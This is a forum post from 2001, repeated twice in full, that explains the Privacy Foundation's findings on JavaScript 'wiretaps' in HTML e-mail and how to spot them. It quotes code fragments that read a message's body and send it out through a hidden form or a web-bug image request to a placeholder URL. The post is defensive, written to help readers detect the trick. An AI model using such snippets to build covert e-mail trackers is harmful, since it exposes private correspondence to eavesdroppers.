surrealchereal
03-07-2001, 03:12 PM
Recently, the Privacy Foundation announced that a simple, hidden JavaScript code segment in HTML-formatted e-mail messages can effectively allow someone to monitor all succeeding messages that are forwarded with the original message included. Clearly, this can cause confidential internal communications to be compromised. Here's a look at how to identify wiretaps and protect yourself from them.
The Privacy Foundation
The Privacy Foundation at the University of Denver conducts research into communications technologies and provides the public with tools to maintain privacy in the information age. You can read the Foundation's report and commentary on e-mail wiretaps. The report cites the following possible uses for this security breach:
The wiretaps can provide the ability to monitor the path of a confidential e-mail message and the written comments attached.
In a business negotiation conducted via e-mail, one side can learn inside information from the other side as the proposal is discussed through the recipient company's internal e-mail system.
A bugged e-mail message can capture thousands of e-mail addresses as the forwarded message is sent around the world.
Commercial entities, particularly those based offshore, may seek to offer e-mail wiretapping as a service.
This security problem is a particularly dangerous one for organizations that conduct conversations containing sensitive internal information via e-mail. The usual scenario for such communication is that a message from an outside source is forwarded from executive to executive within a company, and it includes each person's comments. If there's an e-mail wiretap on the original external document, each time someone forwards the message to someone else, a copy of their message is automatically and invisibly e-mailed to the original sender of the external message (or someone designated by them).
This problem affects only HTML-enabled e-mail readers that have JavaScript turned on by default, such as Microsoft Outlook, Outlook Express, and Netscape Communicator 6. Eudora and AOL 6.0 are not affected, nor are Web mail services such as Yahoo and Hotmail.
How to identify a wiretap
Some people have known about this problem since 1998, when a computer engineer from the University of Washington pointed out the fault to Microsoft, which apparently did nothing about it. Thus, you might want to inspect any extremely sensitive or confidential e-mails that have been passed around your company since 1998. This is especially important for e-mails that include forwards of messages that originated outside your company, although insiders can also use this technology to snoop on other employees.
To check your messages for an e-mail wiretap, you need to open the message and view its source code. This is accomplished differently in each e-mail client, and I would suggest looking at the help files if you can't figure out how to do this. Once you're viewing the source code, here's what to look for. The initial code that JavaScript uses to read the document is:
"contents + document.body.innerHTML;"
One way to send this information is:
"document.hiddenForm.message.value = contents;
document.hiddenForm.submit();"
This puts the data in a form and transmits it. If your browser warns of form submission activity, you can easily detect this. But if the following code is used instead, the message content can be sent almost undetectably via WebBug:
"webBug = new Image();
webBug.src = baseURL + "?message=" + escape(contents);"
More code is required, but if you find these code segments, you should investigate further based on the information in the Privacy Organization's report. Remember, though: If the sender got the HTML file from another source, he or she may be transmitting the wiretap unknowingly.
The Privacy Foundation
The Privacy Foundation at the University of Denver conducts research into communications technologies and provides the public with tools to maintain privacy in the information age. You can read the Foundation's report and commentary on e-mail wiretaps. The report cites the following possible uses for this security breach:
The wiretaps can provide the ability to monitor the path of a confidential e-mail message and the written comments attached.
In a business negotiation conducted via e-mail, one side can learn inside information from the other side as the proposal is discussed through the recipient company's internal e-mail system.
A bugged e-mail message can capture thousands of e-mail addresses as the forwarded message is sent around the world.
Commercial entities, particularly those based offshore, may seek to offer e-mail wiretapping as a service.
This security problem is a particularly dangerous one for organizations that conduct conversations containing sensitive internal information via e-mail. The usual scenario for such communication is that a message from an outside source is forwarded from executive to executive within a company, and it includes each person's comments. If there's an e-mail wiretap on the original external document, each time someone forwards the message to someone else, a copy of their message is automatically and invisibly e-mailed to the original sender of the external message (or someone designated by them).
This problem affects only HTML-enabled e-mail readers that have JavaScript turned on by default, such as Microsoft Outlook, Outlook Express, and Netscape Communicator 6. Eudora and AOL 6.0 are not affected, nor are Web mail services such as Yahoo and Hotmail.
How to identify a wiretap
Some people have known about this problem since 1998, when a computer engineer from the University of Washington pointed out the fault to Microsoft, which apparently did nothing about it. Thus, you might want to inspect any extremely sensitive or confidential e-mails that have been passed around your company since 1998. This is especially important for e-mails that include forwards of messages that originated outside your company, although insiders can also use this technology to snoop on other employees.
To check your messages for an e-mail wiretap, you need to open the message and view its source code. This is accomplished differently in each e-mail client, and I would suggest looking at the help files if you can't figure out how to do this. Once you're viewing the source code, here's what to look for. The initial code that JavaScript uses to read the document is:
"contents + document.body.innerHTML;"
One way to send this information is:
"document.hiddenForm.message.value = contents;
document.hiddenForm.submit();"
This puts the data in a form and transmits it. If your browser warns of form submission activity, you can easily detect this. But if the following code is used instead, the message content can be sent almost undetectably via WebBug:
"webBug = new Image();
webBug.src = baseURL + "?message=" + escape(contents);"
More code is required, but if you find these code segments, you should investigate further based on the information in the Privacy Organization's report. Remember, though: If the sender got the HTML file from another source, he or she may be transmitting the wiretap unknowingly.